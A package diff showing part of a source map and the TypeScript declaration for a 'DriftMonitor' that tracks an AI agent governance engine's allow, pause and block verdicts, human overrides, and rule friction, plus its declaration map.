ACnB,cAAoD;IAEpD,IAAI,CAAC,KAAK,CAAC,OAAO,CAAC,cAAc,CAAC;QAAE,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,QAAQ,EAAE,IAAI,EAAE,CAAC;IAC9E,MAAM,QAAQ,GAAG,QAAQ,CAAC,UAAU,CAAC,CAAC,WAAW,EAAE,CAAC;IAEpD,KAAK,MAAM,OAAO,IAAI,cAAc,EAAE,CAAC;QACrC,MAAM,YAAY,GAAG,QAAQ,CAAC,OAAO,CAAC,CAAC,WAAW,EAAE,CAAC;QACrD,IAAI,QAAQ,CAAC,QAAQ,CAAC,YAAY,CAAC,EAAE,CAAC;YACpC,OAAO;gBACL,OAAO,EAAE,IAAI;gBACb,QAAQ,EAAE,IAAI,YAAY,kBAAkB;aAC7C,CAAC;QACJ,CAAC;IACH,CAAC;IACD,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,QAAQ,EAAE,IAAI,EAAE,CAAC;AAC5C,CAAC;AAED,SAAS,sBAAsB,CAC7B,UAAmB,EACnB,cAAoD;IAEpD,MAAM,QAAQ,GAAG,QAAQ,CAAC,UAAU,CAAC,CAAC;IACtC,MAAM,QAAQ,GAAG,KAAK,CAAC,OAAO,CAAC,cAAc,CAAC,CAAC,CAAC,CAAC,cAAc,CAAC,CAAC,CAAC,CAAC,QAAQ,CAAC,cAAc,CAAC,CAAC,CAAC;IAE7F,KAAK,MAAM,OAAO,IAAI,QAAQ,EAAE,CAAC;QAC/B,IAAI,CAAC;YACH,MAAM,KAAK,GAAG,IAAI,MAAM,CAAC,QAAQ,CAAC,OAAO,CAAC,EAAE,GAAG,CAAC,CAAC;YACjD,IAAI,KAAK,CAAC,IAAI,CAAC,QAAQ,CAAC,EAAE,CAAC;gBACzB,OAAO;oBACL,OAAO,EAAE,IAAI;oBACb,QAAQ,EAAE,oBAAoB,OAAO,GAAG;iBACzC,CAAC;YACJ,CAAC;QACH,CAAC;QAAC,MAAM,CAAC;YACP,0DAA0D;YAC1D,SAAS;QACX,CAAC;IACH,CAAC;IACD,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,QAAQ,EAAE,IAAI,EAAE,CAAC;AAC5C,CAAC;AAED,SAAS,kBAAkB,CACzB,UAAmB,EACnB,cAAoD;IAEpD,MAAM,QAAQ,GAAG,QAAQ,CAAC,UAAU,CAAC,CAAC,WAAW,EAAE,CAAC;IACpD,MAAM,MAAM,GAAG,QAAQ,CAAC,cAAc,CAAC,CAAC,WAAW,EAAE,CAAC;IACtD,MAAM,OAAO,GAAG,QAAQ,CAAC,UAAU,CAAC,MAAM,CAAC,CAAC;IAC5C,OAAO;QACL,OAAO;QACP,QAAQ,EAAE,OAAO,CAAC,CAAC,CAAC,sBAAsB,MAAM,GAAG,CAAC,CAAC,CAAC,IAAI;KAC3D,CAAC;AACJ,CAAC;AAED,SAAS,gBAAgB,CACvB,UAAmB,EACnB,cAAoD;IAEpD,MAAM,QAAQ,GAAG,QAAQ,CAAC,UAAU,CAAC,CAAC,WAAW,EAAE,CAAC;IACpD,MAAM,MAAM,GAAG,QAAQ,CAAC,cAAc,CAAC,CAAC,WAAW,EAAE,CAAC;IACtD,MAAM,OAAO,GAAG,QAAQ,CAAC,QAAQ,CAAC,MAAM,CAAC,CAAC;IAC1C,OAAO;QACL,OAAO;QACP,QAAQ,EAAE,OAAO,CAAC,CAAC,CAAC,oBAAoB,MAAM,GAAG,CAAC,CAAC,CAAC,IAAI;KACzD,CAAC;AACJ,CAAC"}

package/dist/drift-monitor.d.ts

@@ -0,0 +1,81 @@
+/**
+ * Drift Monitor — Background service tracking governance health
+ *
+ * Tracks:
+ *   - Block frequency (are we blocking too much? too little?)
+ *   - Manual overrides (humans overriding PAUSE decisions)
+ *   - Tool friction (which tools cause the most governance friction?)
+ *   - Rule friction (which rules fire most often?)
+ *
+ * Can also read from audit.jsonl for historical analysis.
+ * Stored in .neuroverseos/state.json — separate from MEMORY.md.
+ */
+import type { GovernanceEngine } from './governance-engine';
+export interface DriftState {
+    totalActions: number;
+    allowCount: number;
+    pauseCount: number;
+    blockCount: number;
+    overrideCount: number;
+    toolFriction: Record<string, {
+        blocks: number;
+        pauses: number;
+        allows: number;
+    }>;
+    ruleFriction: Record<string, number>;
+    lastUpdated: number;
+    sessionStart: number;
+}
+export interface DriftStats {
+    totalActions: number;
+    allowCount: number;
+    pauseCount: number;
+    blockCount: number;
+    blockRate: number;
+    pauseRate: number;
+    overrideRate: number;
+    driftSignals: string[];
+}
+export interface DriftProposal {
+    type: 'add_guard' | 'modify_threshold' | 'add_role' | 'add_invariant';
+    reason: string;
+    suggestion: string;
+    evidence: string;
+}
+export interface DriftMonitorConfig {
+    statePath: string;
+    auditPath: string;
+    engine: GovernanceEngine;
+}
+export declare class DriftMonitor {
+    private config;
+    private state;
+    private saveInterval;
+    constructor(config: DriftMonitorConfig);
+    start(): void;
+    stop(): void;
+    /**
+     * Record an action and its governance verdict.
+     */
+    recordAction(tool: string, verdict: 'ALLOW' | 'PAUSE' | 'BLOCK', ruleId?: string): void;
+    /**
+     * Record when a human overrides a PAUSE decision.
+     */
+    recordOverride(): void;
+    /**
+     * Get current drift statistics.
+     */
+    getStats(): DriftStats;
+    /**
+     * Generate amendment proposals based on drift patterns.
+     */
+    generateProposals(): DriftProposal[];
+    /**
+     * Rebuild stats from the audit log (for historical analysis).
+     */
+    rebuildFromAudit(): void;
+    private loadState;
+    private freshState;
+    private saveState;
+}
+//# sourceMappingURL=drift-monitor.d.ts.map

package/dist/drift-monitor.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"drift-monitor.d.ts","sourceRoot":"","sources":["../drift-monitor.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;GAWG;AAGH,OAAO,KAAK,EAAE,gBAAgB,EAAE,MAAM,qBAAqB,CAAC;AAO5D,MAAM,WAAW,UAAU;IACzB,YAAY,EAAE,MAAM,CAAC;IACrB,UAAU,EAAE,MAAM,CAAC;IACnB,UAAU,EAAE,MAAM,CAAC;IACnB,UAAU,EAAE,MAAM,CAAC;IACnB,aAAa,EAAE,MAAM,CAAC;IACtB,YAAY,EAAE,MAAM,CAAC,MAAM,EAAE;QAAE,MAAM,EAAE,MAAM,CAAC;QAAC,MAAM,EAAE,MAAM,CAAC;QAAC,MAAM,EAAE,MAAM,CAAA;KAAE,CAAC,CAAC;IACjF,YAAY,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;IACrC,WAAW,EAAE,MAAM,CAAC;IACpB,YAAY,EAAE,MAAM,CAAC;CACtB;AAED,MAAM,WAAW,UAAU;IACzB,YAAY,EAAE,MAAM,CAAC;IACrB,UAAU,EAAE,MAAM,CAAC;IACnB,UAAU,EAAE,MAAM,CAAC;IACnB,UAAU,EAAE,MAAM,CAAC;IACnB,SAAS,EAAE,MAAM,CAAC;IAClB,SAAS,EAAE,MAAM,CAAC;IAClB,YAAY,EAAE,MAAM,CAAC;IACrB,YAAY,EAAE,MAAM,EAAE,CAAC;CACxB;AAED,MAAM,WAAW,aAAa;IAC5B,IAAI,EAAE,WAAW,GAAG,kBAAkB,GAAG,UAAU,GAAG,eAAe,CAAC;IACtE,MAAM,EAAE,MAAM,CAAC;IACf,UAAU,EAAE,MAAM,CAAC;IACnB,QAAQ,EAAE,MAAM,CAAC;CAClB;AAED,MAAM,WAAW,kBAAkB;IACjC,SAAS,EAAE,MAAM,CAAC;IAClB,SAAS,EAAE,MAAM,CAAC;IAClB,MAAM,EAAE,gBAAgB,CAAC;CAC1B;AAMD,qBAAa,YAAY;IACvB,OAAO,CAAC,MAAM,CAAqB;IACnC,OAAO,CAAC,KAAK,CAAa;IAC1B,OAAO,CAAC,YAAY,CAA+C;gBAEvD,MAAM,EAAE,kBAAkB;IAKtC,KAAK,IAAI,IAAI;IAIb,IAAI,IAAI,IAAI;IAQZ;;OAEG;IACH,YAAY,CAAC,IAAI,EAAE,MAAM,EAAE,OAAO,EAAE,OAAO,GAAG,OAAO,GAAG,OAAO,EAAE,MAAM,CAAC,EAAE,MAAM,GAAG,IAAI;IAgCvF;;OAEG;IACH,cAAc,IAAI,IAAI;IAItB;;OAEG;IACH,QAAQ,IAAI,UAAU;IA0CtB;;OAEG;IACH,iBAAiB,IAAI,aAAa,EAAE;IA6CpC;;OAEG;IACH,gBAAgB,IAAI,IAAI;IA0CxB,OAAO,CAAC,SAAS;IAWjB,OAAO,CAAC,UAAU;IAclB,OAAO,CAAC,SAAS;CAOlB"}